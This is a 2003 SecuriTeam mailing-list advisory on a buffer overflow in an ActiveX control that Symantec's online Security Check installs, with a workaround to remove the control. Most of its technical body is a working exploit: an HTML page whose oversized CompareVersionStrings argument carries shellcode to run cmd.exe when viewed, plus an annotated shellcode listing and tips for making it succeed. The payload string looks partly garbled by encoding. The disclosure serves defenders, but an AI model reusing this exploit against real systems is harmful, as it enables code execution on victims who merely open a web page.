[NT] Symantec Security Check Service ActiveX Buffer Overflow

From: SecuriTeam (support_at_securiteam.com)
Date: 06/24/03

  • Next message: SecuriTeam: "[UNIX] GKrellM Vulnerable to Remotely Exploitable Buffer Overflow (Exploit)" 
    To: list@securiteam.com
Date: 24 Jun 2003 16:51:01 +0200

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    Beyond Security in Canada

    Toronto-based Sunrays Technologies is now Beyond Security's representative in Canada.
    We welcome ISPs, system integrators and IT systems resellers
    to promote the most advanced vulnerability assessment solutions today.

    Contact us at 416-482-0038 or at canadasales@beyondsecurity.com

    - - - - - - - - -

      Symantec Security Check Service ActiveX Buffer Overflow
    ------------------------------------------------------------------------

    SUMMARY

    Symantec has a free online service for virus and security scan called
    Symantec Security Check.
    To access this service a user must go to
    <http://www.symantec.com/securitycheck/>
    http://www.symantec.com/securitycheck/ and then select what kind of scan
    want to run. In order to run scans ActiveX controls are installed in
    user's computer. The ActiveX control has been found to contain an
    exploitable buffer overflow.

    DETAILS

    One of the installed ActiveX controls is called "Symantec RuFSI Utility
    Class" and it has this description: "Norton Internet Security Registry and
    File Information", there isn't documentation on what it does but it looks
    like it's used to collect user's computer information in order to perform
    the scans. If a long string is passed in any of the parameters of
    CompareVersionStrings method a stack based overflow occurs when the method
    is executed.

    To reproduce the overflow just cut-and-paste the following:
    < object classid="clsid:69DEAF94-AF66-11D3-BEC0-00105AA9B6AE" id="test">

    < script>
    test.CompareVersionStrings("long string here","or long string here")
    </script>

    This ActiveX control is marked as safe, so the above sample will run
    without being blocked in default Internet Explorer security configuration.
    This vulnerability can be exploited to run arbitrary code.

    Workaround:
    Go to %SystemRoot%\Downloaded Program Files\ and remove "Symantec RuFSI
    Utility Class".

    Exploit code:
    SecurITeam has built an example exploit code that is able to run the
    cmd.exe whenever the below HTML is viewed (Note it has been hard coded to
    work with Windows 2000 and Internet Explorer 5.5):
    <html>
    <body>
    < object classid="clsid:69DEAF94-AF66-11D3-BEC0-00105AA9B6AE" id="test">
    </object>

    < script language=javascript>
    test.CompareVersionStrings("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABCDE", "̐U3W EcEmEdE.EeExEeï xPEPU_AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAl ")
    </script>
    </body>
    </html>

    <!-- \x90 - NOP
    \xCC - INT3
    \x90 - NOP
    \x90 - NOP
    \x90 - NOP
    \x90 - NOP
    \x8B\xEC - MOV EBP, ESP
    \x55 - PUSH EBP
    \x8B\xEC - MOV EBP, ESP
    \x33\xFF - XOR EDI, EDI
    \x57 - PUSH EDI
    \x83\xEC\x04 0 SUB ESP, 4
    \xC6\x45\xF8\x63 - MOV BYTE PTR SS:[EBP-8],63h
    \xC6\x45\xF9\x6D - MOV BYTE PTR SS:[EBP-7],6Dh
    \xC6\x45\xFA\x64 - MOV BYTE PTR SS:[EBP-6],64h
    \xC6\x45\xFB\x2E - MOV BYTE PTR SS:[EBP-5],2Eh
    \xC6\x45\xFC\x65 - MOV BYTE PTR SS:[EBP-4],65h
    \xC6\x45\xFD\x78 - MOV BYTE PTR SS:[EBP-3],78h
    \xC6\x45\xFE\x65 - MOV BYTE PTR SS:[EBP-2],65h
    \xB8\xC3\xAF\x01\x78 - MOV EAX, MSVCRT.system
    \x50 - PUSH EAX
    \x8D\x45\xF8 - LEA EAX, DWORD PTR SS:[EBP-8]
    \x50 - PUSH EAX
    \xFF\x55\xF4 - CALL DWORD PTR SS:[EBP-C]
    \x5F - POP EDI
    -->

    Notes:
    A few things you should notice if you can't get it to work:
    1) Make sure the MDM.exe (Machine Debug Manager) is not running as it
    places the user buffer in places we didn't plan it to jump to.
    2) Make sure there is only ONE instance of iexplore.exe running, as each
    one has a different buffer area.

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:cesarc56@yahoo.com> Cesar,
    the epxloit code was provided by <mailto:expert@securiteam.com>
    SecurITeam Experts.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

  • Next message: SecuriTeam: "[UNIX] GKrellM Vulnerable to Remotely Exploitable Buffer Overflow (Exploit)"

    Relevant Pages